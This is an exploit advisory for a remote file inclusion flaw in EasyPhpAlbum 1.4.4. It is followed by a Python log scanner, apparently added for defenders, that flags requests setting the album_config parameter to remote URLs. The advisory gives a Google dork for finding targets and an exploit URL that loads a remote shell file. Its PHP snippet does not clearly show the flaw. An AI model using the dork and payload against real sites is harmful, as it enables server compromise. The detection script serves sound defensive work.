EasyPhpAlbum version 1.4.4 suffers from a remote file inclusion vulnerability.
# Exploit Title: EasyPhpAlbum v 1.4.4 Remote file include vulnerability
# Google Dork: powered by EasyPhpAlbum
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.mywebmymail.com
# Version: v 1.4.4
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################
File : index.php
http://localhost/[path]/index.php
Code :
<?php
include('../configuration.php');
$album_config=false;
?>
Exploit :
http://127.0.0.1/[path]/index.php?album_config= [ Shell.txt ]
Enjoy :)
##########################################################
#
Greetz To : #
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #
#
##########################################################
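For defenders, the request shape in the exploit line above can be hunted for in web server access logs. The following is an added example, not part of the original advisory or of EasyPhpAlbum: it assumes combined-format access logs and that legitimate clients never supply `album_config` themselves, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# URL schemes and PHP stream wrappers that make an include pull in outside content.
REMOTE_RE = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect|phar)://|data:)', re.I)
PARAM = "album_config"  # parameter named in the advisory

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jan/2011:10:00:01 +0000] "GET /gallery/index.php?album_config=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [26/Jan/2011:10:00:05 +0000] "GET /gallery/?album.config=x HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [26/Jan/2011:10:01:00 +0000] "GET /gallery/index.php?page=2 HTTP/1.1" 200 2048 "-" "-"',
]

def php_name(key):
    """Normalise a query key the way PHP does when naming request variables:
    dots and spaces become underscores, and an array suffix ([..]) is dropped."""
    return key.split("[", 1)[0].replace(".", "_").replace(" ", "_")

def classify(line):
    """Return (ip, status, verdict, value) for a request that sets PARAM, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # A bare directory request is served by index.php as well.
    if not parts.path.lower().endswith(("/index.php", "/")):
        return None
    # parse_qs percent-decodes keys and values once, as PHP does.
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if php_name(key) != PARAM:
            continue
        value = values[-1]  # PHP keeps the last duplicate of a parameter
        verdict = "remote-include" if REMOTE_RE.match(value) else "param-present"
        return m.group("ip"), int(m.group("status")), verdict, value
    return None

def scan(lines):
    """Return the classified hits for every log line that sets PARAM."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `remote-include` hit answered with status 200 is the one to triage first; `param-present` hits show probing, including the dotted spelling that PHP maps onto the same variable name.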